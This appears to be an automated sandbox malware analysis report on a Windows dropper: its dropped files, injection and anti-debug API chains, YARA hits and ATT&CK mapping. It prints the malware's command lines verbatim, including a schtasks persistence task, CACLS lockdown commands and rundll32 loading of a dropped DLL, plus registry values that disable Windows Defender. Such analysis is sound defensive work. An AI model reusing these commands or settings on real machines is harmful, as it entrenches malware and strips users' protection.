                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe TID: 5960Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe TID: 5116Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 1636Thread sleep count: 116 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 1636Thread sleep time: -3480000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 2620Thread sleep time: -50000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 6080Thread sleep count: 44 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5880Thread sleep count: 42 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5880Thread sleep time: -7560000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 1636Thread sleep time: -30000s >= -30000sJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exe TID: 3492Thread sleep count: 170 > 30
                            Source: C:\Windows\SysWOW64\rundll32.exe TID: 3492Thread sleep time: -170000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                            Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-25516
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-25776
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 180000Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2575
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-2456
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeAPI coverage: 6.7 %
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\clip64[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0041D8CA sldt word ptr [eax]2_2_0041D8CA
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 30000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 50000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 180000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 30000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeAPI call chain: ExitProcess graph end nodegraph_2-25778
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                            Source: mnolyk.exe, 00000009.00000002.834626616.0000000001485000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E5467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_010E5467
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_010E2390
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeCode function: 1_2_00A72390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00A72390
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_0138FC58 FindFirstFileExW,8_2_0138FC58
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_010E2F1D
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0050092B mov eax, dword ptr fs:[00000030h]2_2_0050092B
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_00500D90 mov eax, dword ptr fs:[00000030h]2_2_00500D90
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_0138A9A1 mov eax, dword ptr fs:[00000030h]8_2_0138A9A1
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_0138CFB2 mov eax, dword ptr fs:[00000030h]8_2_0138CFB2
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0040ADB0 GetProcessHeap,HeapFree,2_2_0040ADB0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeMemory allocated: page read and write | page guardJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E6F40 SetUnhandledExceptionFilter,0_2_010E6F40
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_010E6CF0
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeCode function: 1_2_00A76F40 SetUnhandledExceptionFilter,1_2_00A76F40
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeCode function: 1_2_00A76CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00A76CF0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040E61C
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00416F6A
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_004123F1 SetUnhandledExceptionFilter,2_2_004123F1
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0050D070 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0050D070
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0050E883 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0050E883
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_005171D1 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_005171D1
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_00512658 SetUnhandledExceptionFilter,2_2_00512658
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_01387A74 SetUnhandledExceptionFilter,8_2_01387A74
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_0138790F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0138790F
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_0138BB20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0138BB20
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_01387208 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_01387208

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_013738C0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,8_2_013738C0
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /FJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&ExitJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, MainJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /EJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /EJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E18A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_010E18A3
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: GetLocaleInfoA,2_2_00417A20
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: GetLocaleInfoA,2_2_00517C87
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_01387AFC cpuid 8_2_01387AFC
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E7155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_010E7155
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_01393C76 _free,_free,_free,GetTimeZoneInformation,_free,8_2_01393C76
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_022F96A8 GetUserNameA,2_2_022F96A8
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E2BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_010E2BFB

                            Lowering of HIPS / PFW / Operating System Security Settings

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1Jump to behavior

                            Stealing of Sensitive Information

                            barindex
                            Source: Yara matchFile source: 2.3.aTaf.exe.540000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.aTaf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.aTaf.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.aTaf.exe.500e67.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000003.384825400.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 9.2.mnolyk.exe.d50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 22.0.mnolyk.exe.d50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.2.mnolyk.exe.d50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.0.xriv.exe.1370000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.2.xriv.exe.1370000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.3.file.exe.532fa20.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.3.file.exe.532fa20.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.mnolyk.exe.d50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.mnolyk.exe.d50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 22.2.mnolyk.exe.d50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.mnolyk.exe.d50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.mnolyk.exe.d50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.0.mnolyk.exe.d50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.mnolyk.exe.d50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000000.446489289.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000002.658498410.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000016.00000000.531737560.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000000.450697685.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000016.00000002.531952699.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000000.786833097.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.787454951.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.312037051.00000000052D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000000.658223943.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000000.444881236.0000000001371000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.834330424.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.451269241.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, type: DROPPED
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 00000009.00000002.834626616.000000000146C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.834626616.00000000013FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: mnolyk.exe PID: 3136, type: MEMORYSTR
                            Source: Yara matchFile source: 21.2.rundll32.exe.6f460000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\clip64[1].dll, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Source: Yara matchFile source: 2.3.aTaf.exe.540000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.aTaf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.aTaf.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.aTaf.exe.500e67.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000003.384825400.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Valid Accounts3
                            Native API
                            1
                            Windows Service
                            2
                            Bypass User Access Control
                            21
                            Disable or Modify Tools
                            OS Credential Dumping2
                            System Time Discovery
                            Remote Services1
                            Archive Collected Data
                            Exfiltration Over Other Network Medium14
                            Ingress Tool Transfer
                            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                            System Shutdown/Reboot
                            Default Accounts2
                            Command and Scripting Interpreter
                            1
                            Scheduled Task/Job
                            1
                            Access Token Manipulation
                            1
                            Deobfuscate/Decode Files or Information
                            LSASS Memory1
                            Account Discovery
                            Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                            Encrypted Channel
                            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain Accounts1
                            Scheduled Task/Job
                            1
                            Registry Run Keys / Startup Folder
                            1
                            Windows Service
                            2
                            Obfuscated Files or Information
                            Security Account Manager2
                            File and Directory Discovery
                            SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                            Non-Application Layer Protocol
                            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local Accounts1
                            Service Execution
                            1
                            Services File Permissions Weakness
                            111
                            Process Injection
                            2
                            Software Packing
                            NTDS36
                            System Information Discovery
                            Distributed Component Object ModelInput CaptureScheduled Transfer113
                            Application Layer Protocol
                            SIM Card SwapCarrier Billing Fraud
                            Cloud AccountsCronNetwork Logon Script1
                            Scheduled Task/Job
                            1
                            Timestomp
                            LSA Secrets131
                            Security Software Discovery
                            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable MediaLaunchdRc.common1
                            Registry Run Keys / Startup Folder
                            2
                            Bypass User Access Control
                            Cached Domain Credentials31
                            Virtualization/Sandbox Evasion
                            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup Items1
                            Services File Permissions Weakness
                            1
                            Masquerading
                            DCSync2
                            Process Discovery
                            Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job31
                            Virtualization/Sandbox Evasion
                            Proc Filesystem1
                            System Owner/User Discovery
                            Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                            Access Token Manipulation
                            /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)111
                            Process Injection
                            Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                            Services File Permissions Weakness
                            Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                            Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
                            Rundll32
                            KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 signatures2 2 Behavior Graph ID: 801767 Sample: file.exe Startdate: 08/02/2023 Architecture: WINDOWS Score: 100 68 Snort IDS alert for network traffic 2->68 70 Malicious sample detected (through community Yara rule) 2->70 72 Antivirus detection for URL or domain 2->72 74 8 other signatures 2->74 9 file.exe 1 4 2->9         started        12 rundll32.exe 2->12         started        14 rundll32.exe 2->14         started        16 4 other processes 2->16 process3 file4 56 C:\Users\user\AppData\Local\Temp\...\xriv.exe, PE32 9->56 dropped 58 C:\Users\user\AppData\Local\Temp\...\bmKg.exe, PE32 9->58 dropped 18 bmKg.exe 1 4 9->18         started        22 xriv.exe 3 9->22         started        process5 dnsIp6 50 C:\Users\user\AppData\Local\Temp\...\nika.exe, PE32 18->50 dropped 52 C:\Users\user\AppData\Local\Temp\...\aTaf.exe, PE32 18->52 dropped 76 Multi AV Scanner detection for dropped file 18->76 78 Machine Learning detection for dropped file 18->78 25 aTaf.exe 9 1 18->25         started        28 nika.exe 1 1 18->28         started        64 192.168.2.1 unknown unknown 22->64 54 C:\Users\user\AppData\Local\...\mnolyk.exe, PE32 22->54 dropped 80 Contains functionality to inject code into remote processes 22->80 30 mnolyk.exe 17 22->30         started        file7 signatures8 process9 dnsIp10 82 Detected unpacking (changes PE section rights) 25->82 84 Detected unpacking (overwrites its own PE header) 25->84 86 Disable Windows Defender notifications (registry) 25->86 88 Disable Windows Defender real time protection (registry) 25->88 66 62.204.41.4, 49695, 49696, 49697 TNNET-ASTNNetOyMainnetworkFI United Kingdom 30->66 60 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 30->60 dropped 62 C:\Users\user\AppData\Local\...\clip64[1].dll, PE32 30->62 dropped 90 Multi AV Scanner detection for dropped file 30->90 92 Creates an undocumented autostart registry key 30->92 94 Machine Learning detection for dropped file 30->94 96 Uses schtasks.exe or at.exe to add and modify task schedules 30->96 34 cmd.exe 1 30->34         started        36 schtasks.exe 1 30->36         started        38 rundll32.exe 30->38         started        file11 signatures12 process13 process14 40 conhost.exe 34->40         started        42 cmd.exe 1 34->42         started        44 cmd.exe 1 34->44         started        48 4 other processes 34->48 46 conhost.exe 36->46         started       

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand
                            SourceDetectionScannerLabelLink
